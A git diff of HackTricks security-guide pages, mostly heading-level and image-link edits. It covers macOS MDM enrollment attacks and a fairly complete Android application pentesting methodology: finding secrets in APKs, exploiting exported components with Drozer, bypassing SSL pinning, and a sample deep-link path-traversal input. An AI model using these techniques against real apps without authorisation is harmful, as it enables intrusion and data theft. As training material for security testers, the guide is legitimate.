This part of the process occurs when a **user boots a Mac for the first time** (or after a complete wipe)
|
||||
|
||||
|
@ -127,14 +126,14 @@ It follows a few steps to get the Activation Record performed by **`MCTeslaConfi
|
|||
2. The JSON payload is encrypted using Absinthe (**`NACSign`**)
|
||||
3. All requests over HTTPs, built-in root certificates are used
|
||||
|
||||
![](<../../../.gitbook/assets/image (566).png>)
|
||||
![](<../../../.gitbook/assets/image (566) (1).png>)
|
||||
|
||||
The response is a JSON dictionary with some important data like:
|
||||
|
||||
* **url**: URL of the MDM vendor host for the activation profile
|
||||
* **anchor-certs**: Array of DER certificates used as trusted anchors
|
||||
|
||||
### **Step 5: Profile Retrieval**
|
||||
#### **Step 5: Profile Retrieval**
|
||||
|
||||
![](<../../../.gitbook/assets/image (567).png>)
|
||||
|
||||
|
@ -149,7 +148,7 @@ The response is a JSON dictionary with some important data like:
|
|||
|
||||
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
### Step 6: Profile Installation
|
||||
#### Step 6: Profile Installation
|
||||
|
||||
* Once retrieved, **profile is stored on the system**
|
||||
* This step begins automatically (if in **setup assistant**)
|
||||
|
@ -184,7 +183,7 @@ Typically, **activation profile** provided by an MDM vendor will **include the f
|
|||
* Property: IdentityCertificateUUID
|
||||
* Delivered via SCEP payload
|
||||
|
||||
### **Step 7: Listening for MDM commands**
|
||||
#### **Step 7: Listening for MDM commands**
|
||||
|
||||
* After MDM check-in is complete, vendor can **issue push notifications using APNs**
|
||||
* Upon receipt, handled by **`mdmclient`**
|
||||
|
@ -193,9 +192,9 @@ Typically, **activation profile** provided by an MDM vendor will **include the f
|
|||
* **`ServerURLPinningCertificateUUIDs`** for pinning request
|
||||
* **`IdentityCertificateUUID`** for TLS client certificate
|
||||
|
||||
## Attacks
|
||||
### Attacks
|
||||
|
||||
### Enrolling Devices in Other Organisations
|
||||
#### Enrolling Devices in Other Organisations
|
||||
|
||||
As previously commented, in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\
|
||||
Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected:
|
||||
|
@ -204,12 +203,11 @@ Therefore, this could be a dangerous entrypoint for attackers if the enrolment p
|
|||
[enrolling-devices-in-other-organisations.md](enrolling-devices-in-other-organisations.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## **References**
|
||||
### **References**
|
||||
|
||||
* [https://www.youtube.com/watch?v=ku8jZe-MHUU](https://www.youtube.com/watch?v=ku8jZe-MHUU)
|
||||
* [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -225,5 +223,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Android Applications Pentesting
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## Android Applications Pentesting
|
||||
|
||||
# Android Applications Pentesting
|
||||
|
||||
## Android Applications Basics
|
||||
### Android Applications Basics
|
||||
|
||||
It's highly recommended to start reading this page to know about the **most important parts related to Android security and the most dangerous components in an Android application**:
|
||||
|
||||
|
@ -27,19 +26,19 @@ It's highly recommended to start reading this page to know about the **most impo
|
|||
[android-applications-basics.md](android-applications-basics.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## ADB (Android Debug Bridge)
|
||||
### ADB (Android Debug Bridge)
|
||||
|
||||
This is the main tool you need to connect to an android device (emulated or physical).\
|
||||
It allows you to control your device over **USB** or **Network** from a computer, **copy** files back and forth, **install** and uninstall apps, run **shell** commands, perform **backups**, read **logs** and more.
|
||||
|
||||
Take a look to the following list of [**ADB Commands**](adb-commands.md) \_\*\*\_to learn how to use adb.
|
||||
|
||||
## Smali
|
||||
### Smali
|
||||
|
||||
Sometimes it is interesting to **modify the application code** to access **hidden information** (maybe well obfuscated passwords or flags). Then, it could be interesting to decompile the apk, modify the code and recompile it.\
|
||||
[**In this tutorial** you can **learn how to decompile and APK, modify Smali code and recompile the APK** with the new functionality](smali-changes.md). This could be very useful as an **alternative for several tests during the dynamic analysis** that are going to presented. Then, **keep always in mid this possibility**.
|
||||
|
||||
## Other interesting tricks
|
||||
### Other interesting tricks
|
||||
|
||||
* [Spoofing your location in Play Store](spoofing-your-location-in-play-store.md)
|
||||
* **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/)
|
||||
|
@ -55,20 +54,20 @@ package:/data/app/com.android.insecurebankv2-Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
|
|||
adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
|
||||
```
|
||||
|
||||
## Static Analysis
|
||||
### Static Analysis
|
||||
|
||||
First of all, for analysing an APK you should **take a look to the to the Java code** using a decompiler.\
|
||||
Please, [**read here to find information about different available decompilers**](apk-decompilers.md).
|
||||
|
||||
### Looking for interesting Info
|
||||
#### Looking for interesting Info
|
||||
|
||||
Just taking a look to the **strings** of the APK you can search for **passwords**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api** keys, **encryption**, **bluetooth uuids**, **tokens** and anything interesting... look even for code execution **backdoors** or authentication backdoors (hardcoded admin credentials to the app).
|
||||
|
||||
#### Firebase
|
||||
**Firebase**
|
||||
|
||||
Pay special attention to **firebase URLs** and check if it is bad configured. [More information about whats is FIrebase and how to exploit it here.](../../pentesting/pentesting-web/buckets/firebase-database.md)
|
||||
|
||||
### Basic understanding of the application - Manifest.xml, strings.xml
|
||||
#### Basic understanding of the application - Manifest.xml, strings.xml
|
||||
|
||||
Using any of the **decompilers** mentioned [**here** ](apk-decompilers.md)you will be able to read the _Manifest.xml_. You could also **rename** the **apk** file extension **to .zip** and **unzip** it.\
|
||||
Reading the **manifest** you can find **vulnerabilities**:
|
||||
|
@ -93,7 +92,7 @@ Reading **resources.arsc/strings.xml** you can find some **interesting info**:
|
|||
* Custom schemas
|
||||
* Other interesting info developers save in this file
|
||||
|
||||
### Tapjacking
|
||||
#### Tapjacking
|
||||
|
||||
**Tapjacking** is an attack where a **malicious** **application** is launched and **positions itself on top of a victim application**. Once it visibly obscures the victim app, its user interface is designed in such a way as to trick the user to interact with it, while it is passing the interaction along to the victim app.\
|
||||
In effect, it is **blinding the user from knowing they are actually performing actions on the victim app**.
|
||||
|
@ -119,21 +118,21 @@ The mitigation is relatively simple as the developer may choose not to receive t
|
|||
>
|
||||
> To enable touch filtering, call [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) or set the android:filterTouchesWhenObscured layout attribute to true. When enabled, the framework will discard touches that are received whenever the view's window is obscured by another visible window. As a result, the view will not receive touches whenever a toast, dialog or other window appears above the view's window.
|
||||
|
||||
### Task Hijacking
|
||||
#### Task Hijacking
|
||||
|
||||
{% content-ref url="android-task-hijacking.md" %}
|
||||
[android-task-hijacking.md](android-task-hijacking.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Insecure data storage
|
||||
#### Insecure data storage
|
||||
|
||||
#### Internal Storage
|
||||
**Internal Storage**
|
||||
|
||||
Files **created** on **internal** storage are **accessible** only by the **app**. This protection is implemented by Android and is sufficient for most applications. But developers often use `MODE_WORLD_READBALE` & `MODE_WORLD_WRITABLE` to give access to those files to a different application, but this doesn’t limit other apps(malicious) from accessing them.\
|
||||
During the **static** analysis **check** for the use of those **modes**, during the **dynamic** analysis **check** the **permissions** of the files created (maybe some of them are worldwide readable/writable).\
|
||||
[More information about this vulnerability and how to fix it here.](https://manifestsecurity.com/android-application-security-part-8/)
|
||||
|
||||
#### External Storage
|
||||
**External Storage**
|
||||
|
||||
Files created on **external storage**, such as SD Cards, are **globally readable and writable**. Because external storage can be removed by the user and also modified by any application, you should **not store sensitive information using external storage**.\
|
||||
As with data from any untrusted source, you should **perform input validation** when handling **data from external storage**. We strongly recommend that you not store executables or class files on external storage prior to dynamic loading. If your app does retrieve executable files from external storage, the files should be signed and cryptographically verified prior to dynamic loading.\
|
||||
|
@ -145,14 +144,14 @@ External storage can be **accessed** in `/storage/emulated/0` , `/sdcard` , `/mn
|
|||
Starting with Android 4.4 (**API 17**), the SD card has a directory structure which **limits access from an app to the directory which is specifically for that app**. This prevents malicious application from gaining read or write access to another app's files.
|
||||
{% endhint %}
|
||||
|
||||
#### Sensitive data stored in clear-text
|
||||
**Sensitive data stored in clear-text**
|
||||
|
||||
* **Shared preferences**: Android allow to each application to easily save xml files in the path `/data/data/<packagename>/shared_prefs/` and sometimes it's possible to find sensitive information in clear-text in that folder.
|
||||
* **Databases**: Android allow to each application to easily save sqlite databases in the path `/data/data/<packagename>/databases/` and sometimes it's possible to find sensitive information in clear-text in that folder.
|
||||
|
||||
### Broken TLS
|
||||
#### Broken TLS
|
||||
|
||||
#### Accept All Certificates
|
||||
**Accept All Certificates**
|
||||
|
||||
For some reason sometimes developers accept all the certificates even if for example the hostname does not match with lines of code like the following one:
|
||||
|
||||
|
@ -163,17 +162,17 @@ sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
|
|||
|
||||
A good way to test this is to try to capture the traffic using some proxy like Burp without authorising Burp CA inside the device. Also, you can generate with Burp a certificate for a different hostname and use it.
|
||||
|
||||
### Broken Cryptography
|
||||
#### Broken Cryptography
|
||||
|
||||
#### Poor Key Management Processes <a href="#poorkeymanagementprocesses" id="poorkeymanagementprocesses"></a>
|
||||
**Poor Key Management Processes**
|
||||
|
||||
Some developers save sensitive data in the local storage and encrypt it with a key hardcoded/predictable in the code. This shouldn't be done as some reversing could allow attackers to extract the confidential information.
|
||||
|
||||
#### Use of Insecure and/or Deprecated Algorithms <a href="#useofinsecureandordeprecatedalgorithms" id="useofinsecureandordeprecatedalgorithms"></a>
|
||||
**Use of Insecure and/or Deprecated Algorithms**
|
||||
|
||||
Developers shouldn't use **deprecated algorithms** to perform authorisation **checks**, **store** or **send** data. Some of these algorithms are: RC4, MD4, MD5, SHA1... If **hashes** are used to store passwords for example, hashes brute-force **resistant** should be used with salt.
|
||||
|
||||
### Other checks
|
||||
#### Other checks
|
||||
|
||||
* It's recommended to **obfuscate the APK** to difficult the reverse engineer labour to attackers.
|
||||
* If the app is sensitive (like bank apps), it should perform it's **own checks to see if the mobile is rooted** and act in consequence.
|
||||
|
@ -181,7 +180,7 @@ Developers shouldn't use **deprecated algorithms** to perform authorisation **ch
|
|||
* If the app is sensitive (like bank apps), it should **check it's own integrity before executing** it to check if it was modified.
|
||||
* Use [**APKiD**](https://github.com/rednaga/APKiD) to check which compiler/packer/obfuscator was used to build the APK
|
||||
|
||||
### React Native Application
|
||||
#### React Native Application
|
||||
|
||||
Read the following page to learn how to easily access javascript code of React applications:
|
||||
|
||||
|
@ -189,7 +188,7 @@ Read the following page to learn how to easily access javascript code of React a
|
|||
[react-native-application.md](react-native-application.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### Xamarin Applications
|
||||
#### Xamarin Applications
|
||||
|
||||
**Xamarin** apps are written in **C#**, in order to access the C# code **decompressed,** you need to get the files from the **apk**:
|
||||
|
||||
|
@ -205,30 +204,30 @@ python3 xamarin-decompress.py -o /path/to/decompressed/apk
|
|||
|
||||
and finally you can use [**these recommended tools**](../../reversing/reversing-tools-basic-methods/#net-decompiler) to **read C# code** from the DLLs.
|
||||
|
||||
### Automated Static Code Analysis
|
||||
#### Automated Static Code Analysis
|
||||
|
||||
The tool [**mariana-trench**](https://github.com/facebook/mariana-trench) is capable of finding **vulnerabilities** by **scanning** the **code** of the application. This tool contains a series of **known sources** (that indicates to the tool the **places** where the **input** is **controlled by the user**), **sinks** (which indicates to the tool **dangerous** **places** where malicious user input could cause damages) and **rules**. These rules indicates the **combination** of **sources-sinks** that indicates a vulnerability.
|
||||
|
||||
With this knowledge, **mariana-trench will review the code and find possible vulnerabilities on it**.
|
||||
|
||||
### Other interesting functions
|
||||
#### Other interesting functions
|
||||
|
||||
* **Code execution**: `Runtime.exec(), ProcessBuilder(), native code:system()`
|
||||
* **Send SMSs**: `sendTextMessage, sendMultipartTestMessage`
|
||||
* **Native functions** declared as `native`: `public native, System.loadLibrary, System.load`
|
||||
* [Read this to learn **how to reverse native functions**](reversing-native-libraries.md)
|
||||
|
||||
### **Other tricks**
|
||||
#### **Other tricks**
|
||||
|
||||
{% content-ref url="content-protocol.md" %}
|
||||
[content-protocol.md](content-protocol.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## Dynamic Analysis
|
||||
### Dynamic Analysis
|
||||
|
||||
> First of all, you need an environment where you can install the application and all the environment (Burp CA cert, Drozer and Frida mainly). Therefore, a rooted device (emulated or not) is extremely recommended.
|
||||
|
||||
### Online Dynamic analysis
|
||||
#### Online Dynamic analysis
|
||||
|
||||
You can create a **free account** in: [https://appetize.io/](https://appetize.io). This platform allows you to **upload** and **execute** APKs, so it is useful to see how an apk is behaving.
|
||||
|
||||
|
@ -238,7 +237,7 @@ You can even **see the logs of your application** in the web and connect through
|
|||
|
||||
Thanks to the ADB connection you can use **Drozer** and **Frida** inside the emulators.
|
||||
|
||||
### Local Dynamic Analysis
|
||||
#### Local Dynamic Analysis
|
||||
|
||||
You can use some **emulator** like:
|
||||
|
||||
|
@ -269,9 +268,9 @@ Or you could use a **physical** **device** (you need to activate the debugging o
|
|||
> Once you have installed the application, the first thing you should do is to try it and investigate what does it do, how does it work and get comfortable with it.\
|
||||
> I will suggest to **perform this initial dynamic analysis using MobSF dynamic analysis + pidcat**, so will will be able to **learn how the application works** while MobSF **capture** a lot of **interesting** **data** you can review later on.
|
||||
|
||||
### Unintended Data Leakage
|
||||
#### Unintended Data Leakage
|
||||
|
||||
#### Logging
|
||||
**Logging**
|
||||
|
||||
Often Developers leave debugging information publicly. So any application with `READ_LOGS` permission can **access those logs** and can gain sensitive information through that.\
|
||||
While navigating through the application use [**pidcat**](https://github.com/JakeWharton/pidcat)_(Recommended, it's easier to use and read_) or [adb logcat](adb-commands.md#logcat) to read the created logs and **look for sensitive information**.
|
||||
|
@ -285,16 +284,16 @@ Anyway, it's still recommended to **not log sensitive information**.
|
|||
|
||||
Android provides **clipboard-based** framework to provide copy-paste function in android applications. But this creates serious issue when some **other application** can **access** the **clipboard** which contain some sensitive data. **Copy/Paste** function should be **disabled** for **sensitive part** of the application. For example, disable copying credit card details.
|
||||
|
||||
#### Crash Logs <a href="#crashlogs" id="crashlogs"></a>
|
||||
**Crash Logs**
|
||||
|
||||
If an application **crashes** during runtime and it **saves logs** somewhere then those logs can be of help to an attacker especially in cases when android application cannot be reverse engineered. Then, avoid creating logs when applications crashes and if logs are sent over the network then ensure that they are sent over an SSL channel.\
|
||||
As pentester, **try to take a look to these logs**.
|
||||
|
||||
#### Analytics Data Sent To 3rd Parties <a href="#analyticsdatasentto3rdparties" id="analyticsdatasentto3rdparties"></a>
|
||||
**Analytics Data Sent To 3rd Parties**
|
||||
|
||||
Most of the application uses other services in their application like Google Adsense but sometimes they **leak some sensitive data** or the data which is not required to sent to that service. This may happen because of the developer not implementing feature properly. You can **look by intercepting the traffic** of the application and see whether any sensitive data is sent to 3rd parties or not.
|
||||
|
||||
### SQLite DBs
|
||||
#### SQLite DBs
|
||||
|
||||
Most of the applications will use **internal SQLite databases** to save information. During the pentest take a **look** to the **databases** created, the names of **tables** and **columns** and all the **data** saved because you could find **sensitive information** (which would be a vulnerability).\
|
||||
Databases should be located in `/data/data/the.package.name/databases` like `/data/data/com.mwr.example.sieve/databases`
|
||||
|
@ -303,17 +302,17 @@ If the database is saving confidential information and is **encrypted b**ut you
|
|||
|
||||
Enumerate the tables using `.tables` and enumerate the columns of the tables doing `.schema <table_name>`
|
||||
|
||||
### Drozer (Exploit Activities, Content Providers and Services)
|
||||
#### Drozer (Exploit Activities, Content Providers and Services)
|
||||
|
||||
**Drozer** allows you to **assume the role of an Android app** and interact with other apps. It can do **anything that an installed application can do**, such as make use of Android’s Inter-Process Communication (IPC) mechanism and interact with the underlying operating system. From [Drozer Guide](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf).\
|
||||
Drozer is s useful tool to **exploit exported activities, exported services and Content Providers** as you will learn in the following sections.
|
||||
|
||||
### Exploiting exported Activities
|
||||
#### Exploiting exported Activities
|
||||
|
||||
[**Read this if you want to remind what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\
|
||||
\_\*\*\_Also remember that the code of an activity starts with the `onCreate` method.
|
||||
|
||||
#### Authorisation bypass
|
||||
**Authorisation bypass**
|
||||
|
||||
When an Activity is exported you can invoke its screen from an external app. Therefore, if an activity with **sensitive information** is **exported** you could **bypass** the **authentication** mechanisms **to access it.**\
|
||||
[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/#activities)
|
||||
|
@ -337,13 +336,13 @@ Note that an authorisation bypass is not always a vulnerability, it would depend
|
|||
|
||||
**Activities can also return results**. If you manage to find an exported and unprotected activity calling the **`setResult`** method and **returning sensitive information**, there is a sensitive information leakage.
|
||||
|
||||
### Exploiting Content Providers - Accessing and manipulating sensitive information
|
||||
#### Exploiting Content Providers - Accessing and manipulating sensitive information
|
||||
|
||||
[**Read this if you want to remind what is a Content Provider.**](android-applications-basics.md#content-provider)\
|
||||
Content providers are basically used to **share data**. If an app has available content providers you may be able to **extract sensitive** data from them. It also interesting to test possible **SQL injections** and **Path Traversals** as they could be vulnerable.\
|
||||
[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/#content-providers)
|
||||
|
||||
### **Exploiting Services**
|
||||
#### **Exploiting Services**
|
||||
|
||||
[**Read this if you want to remind what is a Service.**](android-applications-basics.md#services)\
|
||||
\_\*\*\_Remember that a the actions of a Service start in the method `onStartCommand`.
|
||||
|
@ -351,7 +350,7 @@ Content providers are basically used to **share data**. If an app has available
|
|||
As service is basically something that **can receive data**, **process** it and **returns** (or not) a response. Then, if an application is exporting some services you should **check** the **code** to understand what is it doing and **test** it **dynamically** for extracting confidential info, bypassing authentication measures...\
|
||||
[**Learn how to exploit Services with Drozer.**](drozer-tutorial/#services)
|
||||
|
||||
### **Exploiting Broadcast Receivers**
|
||||
#### **Exploiting Broadcast Receivers**
|
||||
|
||||
[**Read this if you want to remind what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)\
|
||||
\_\*\*\_Remember that a the actions of a Broadcast Receiver start in the method `onReceive`.
|
||||
|
@ -359,7 +358,7 @@ As service is basically something that **can receive data**, **process** it and
|
|||
A broadcast receiver will be waiting for a type of message. Depending on ho the receiver handles the message it could be vulnerable.\
|
||||
[**Learn how to exploit Broadcast Receivers with Drozer.**](./#exploiting-broadcast-receivers)
|
||||
|
||||
### **Exploiting Schemes / Deep links**
|
||||
#### **Exploiting Schemes / Deep links**
|
||||
|
||||
You can look for deep links manually, using tools like MobSF or scripts like [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).\
|
||||
You can **open** a declared **scheme** using **adb** or a **browser**:
|
||||
|
@ -377,26 +376,26 @@ _Note that you can **omit the package name** and the mobile will automatically c
|
|||
<a href="intent://hostname#Intent;scheme=scheme;package=your.package.name;S.browser_fallback_url=http%3A%2F%2Fwww.example.com;end">with alternative</a>
|
||||
```
|
||||
|
||||
#### Code executed
|
||||
**Code executed**
|
||||
|
||||
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
|
||||
|
||||
![](<../../.gitbook/assets/image (436) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (436) (1) (1) (1).png>)
|
||||
|
||||
#### Sensitive info
|
||||
**Sensitive info**
|
||||
|
||||
Every time you find a deep link check that i**t's not receiving sensitive data (like passwords) via URL parameters**, because any other application could **impersonate the deep link and steal that data!**
|
||||
|
||||
#### Parameters in path
|
||||
**Parameters in path**
|
||||
|
||||
You **must check also if any deep link is using a parameter inside the path** of the URL like: `https://api.example.com/v1/users/{username}` , in that case you can force a path traversal accessing something like: `example://app/users?username=../../unwanted-endpoint%3fparam=value` .\
|
||||
Note that if you find the correct endpoints inside the application you may be able to cause a **Open Redirect** (if part of the path is used as domain name), **account takeover** (if you can modify users details without CSRF token and the vuln endpoint used the correct method) and any other vuln. More [info about this here](http://dphoeniixx.com/2020/12/13-2/).
|
||||
|
||||
#### More examples
|
||||
**More examples**
|
||||
|
||||
An [interesting bug bounty report](https://hackerone.com/reports/855618) about links (_/.well-known/assetlinks.json_).
|
||||
|
||||
### Insufficient Transport Layer Protection
|
||||
#### Insufficient Transport Layer Protection
|
||||
|
||||
* **Lack of Certificate Inspection:** Android Application fails to verify the identity of the certificate presented to it. Most of the application ignore the warnings and accept any self-signed certificate presented. Some Application instead pass the traffic through an HTTP connection.
|
||||
* **Weak Handshake Negotiation:** Application and server perform an SSL/TLS handshake but use an insecure cipher suite which is vulnerable to MITM attacks. So any attacker can easily decrypt that connection.
|
||||
|
@ -405,20 +404,20 @@ An [interesting bug bounty report](https://hackerone.com/reports/855618) about l
|
|||
From the 3 scenarios presented we are going to discuss **how to verify the identity of the certificate**. The other 2 scenarios depends on the **TLS configuratio**n of the server and if the **application sends unencrypted data**. The pentester should check by it's own the TLS configuration of the server ([here](../../pentesting/pentesting-web/#ssl-tls-vulnerabilites)) and detect if any **confidential information is sent by an unencrypted/vulnerable** channel .\
|
||||
More information about how to discover and fix these kind of vulnerabilities [**here**](https://manifestsecurity.com/android-application-security-part-10/).
|
||||
|
||||
#### SSL Pinning
|
||||
**SSL Pinning**
|
||||
|
||||
By default, when making an SSL connection, the client(android app) checks that the server’s certificate has a verifiable chain of trust back to a trusted (root) certificate and matches the requested hostname. This lead to problem of **Man in the Middle Attacks(MITM)**.\
|
||||
In certificate Pinnning, an Android Application itself contains the certificate of server and only transmit data if the same certificate is presented.\
|
||||
It's recommended to **apply SSL Pinning** for the sites where sensitive information is going to be sent.
|
||||
|
||||
### Inspecting HTTP traffic
|
||||
#### Inspecting HTTP traffic
|
||||
|
||||
First of all, you should (must) **install the certificate** of the **proxy** tool that you are going to use, probably Burp. If you don't install the CA certificate of the proxy tool, you probably aren't going to see the encrypted traffic in the proxy.\
|
||||
**Please,** [**read this guide to learn how to do install a custom CA certificate**](android-burp-suite-settings.md)**.**
|
||||
|
||||
For applications targeting **API Level 24+ it isn't enough to install the Burp CA** certificate in the device. To bypass this new protection you need to modify the Network Security Config file. So, you could modify this file to authorise your CA certificate or you can [**read this page for a tutorial on how to force the application to accept again all the installed certificate sin the device**](make-apk-accept-ca-certificate.md).
|
||||
|
||||
#### SSL Pinning
|
||||
**SSL Pinning**
|
||||
|
||||
We have already discuss what is SSL Pinning just 2 paragraphs before. When it's implemented in an application you will need to bypass it to inspect the HTTPS traffic or you won't see it.\
|
||||
Here I'm going to present a few options I've used to bypass this protection:
|
||||
|
@ -429,11 +428,11 @@ Here I'm going to present a few options I've used to bypass this protection:
|
|||
* You can also try to **automatically bypass SSL Pinning** using **MobSF dynamic analysis** (explained below)
|
||||
* If you still think that there is some traffic that you aren't capturing you can try to **forward the traffic to burp using iptables**. Read this blog: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62)
|
||||
|
||||
#### Common Web vulnerabilities
|
||||
**Common Web vulnerabilities**
|
||||
|
||||
Note that in this step you should look for common web vulnerabilities. A lot of information about web vulnerabilities be found in this book so I'm not going to mention them here.
|
||||
|
||||
### Frida
|
||||
#### Frida
|
||||
|
||||
Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers. Learn more at [www.frida.re](https://www.frida.re).\
|
||||
**It's amazing, you can access running application and hook methods on run time to change the behaviour, change values, extract values, run different code...**\
|
||||
|
@ -444,17 +443,17 @@ Dynamic instrumentation toolkit for developers, reverse-engineers, and security
|
|||
**Some other abstractions based on Frida:** [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)\
|
||||
**You can find some Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)
|
||||
|
||||
### **Android Application Analyzer**
|
||||
#### **Android Application Analyzer**
|
||||
|
||||
This tool could help you managing different tools during the dynamic analysis: [https://github.com/NotSoSecure/android\_application\_analyzer](https://github.com/NotSoSecure/android\_application\_analyzer)
|
||||
|
||||
### Intent Injection
|
||||
#### Intent Injection
|
||||
|
||||
This vulnerability resembles **Open Redirect in web security**. Since class `Intent` is `Parcelable`, **objects belonging to this class** can be **passed** as **extra** **data** in another `Intent` object.\
|
||||
Many developers make **use** of this **feature** and create **proxy** **components** (activities, broadcast receivers and services) that **take an embedded Intent and pass it to dangerous methods** like `startActivity(...)`, `sendBroadcast(...)`, etc.\
|
||||
This is dangerous because **an attacker can force the app to launch a non-exported component that cannot be launched directly from another app**, or to grant the attacker access to its content providers. **`WebView`** also sometimes changes a **URL from a string to an `Intent`** object, using the `Intent.parseUri(...)` method, and passes it to `startActivity(...)`.
|
||||
|
||||
### Android Client Side Injections and others
|
||||
#### Android Client Side Injections and others
|
||||
|
||||
Probably you know about this kind of vulnerabilities from the Web. You have to be specially careful with this vulnerabilities in an Android application:
|
||||
|
||||
|
@ -464,11 +463,11 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
|
|||
* **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk
|
||||
* [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
|
||||
|
||||
## Automatic Analysis
|
||||
### Automatic Analysis
|
||||
|
||||
### [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
|
||||
#### [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
|
||||
|
||||
#### Static analysis
|
||||
**Static analysis**
|
||||
|
||||
![](<../../.gitbook/assets/image (61).png>)
|
||||
|
||||
|
@ -484,7 +483,7 @@ Also, if you create a **ZIP** file with the source code if an **Android** or an
|
|||
|
||||
MobSF also allows you to **diff/Compare** analysis and to integrate **VirusTotal** (you will need to set your API key in _MobSF/settings.py_ and enable it: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`). You can also set `VT_UPLOAD` to `False`, then the **hash** will be **upload** instead of the file.
|
||||
|
||||
### Assisted Dynamic analysis with MobSF
|
||||
#### Assisted Dynamic analysis with MobSF
|
||||
|
||||
**MobSF** can also be very helpful for **dynamic analysis** in **Android**, but in that case you will need to install MobSF and **genymotion** in your host (a VM or Docker won't work). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_\
|
||||
The **MobSF dynamic analyser** can:
|
||||
|
@ -544,7 +543,7 @@ adb shell settings put global http_proxy :0
|
|||
```
|
||||
{% endhint %}
|
||||
|
||||
### Assisted Dynamic Analysis with Inspeckage
|
||||
#### Assisted Dynamic Analysis with Inspeckage
|
||||
|
||||
You can get the tool from [**Inspeckage**](https://github.com/ac-pm/Inspeckage).\
|
||||
This tool with use some **Hooks** to let you know **what is happening in the application** while you perform a **dynamic analysis**.
|
||||
|
@ -553,13 +552,13 @@ This tool with use some **Hooks** to let you know **what is happening in the app
|
|||
[inspeckage-tutorial.md](inspeckage-tutorial.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### [Yaazhini](https://www.vegabird.com/yaazhini/)
|
||||
#### [Yaazhini](https://www.vegabird.com/yaazhini/)
|
||||
|
||||
This is a **great tool to perform static analysis with a GUI**
|
||||
|
||||
![](<../../.gitbook/assets/image (527).png>)
|
||||
|
||||
### [Qark](https://github.com/linkedin/qark)
|
||||
#### [Qark](https://github.com/linkedin/qark)
|
||||
|
||||
This tool is designed to look for several **security related Android application vulnerabilities**, either in **source code** or **packaged APKs**. The tool is also **capable of creating a "Proof-of-Concept" deployable APK** and **ADB commands**, to exploit some of the found vulnerabilities (Exposed activities, intents, tapjacking...). As with Drozer, there is no need to root the test device.
|
||||
|
||||
|
@ -570,7 +569,7 @@ qark --java path/to/parent/java/folder
|
|||
qark --java path/to/specific/java/file.java
|
||||
```
|
||||
|
||||
### [**ReverseAPK**](https://github.com/1N3/ReverseAPK.git)
|
||||
#### [**ReverseAPK**](https://github.com/1N3/ReverseAPK.git)
|
||||
|
||||
* Displays all extracted files for easy reference
|
||||
* Automatically decompile APK files to Java and Smali format
|
||||
|
@ -596,7 +595,7 @@ qark --java path/to/specific/java/file.java
|
|||
reverse-apk relative/path/to/APP.apk
|
||||
```
|
||||
|
||||
### [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super)
|
||||
#### [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super)
|
||||
|
||||
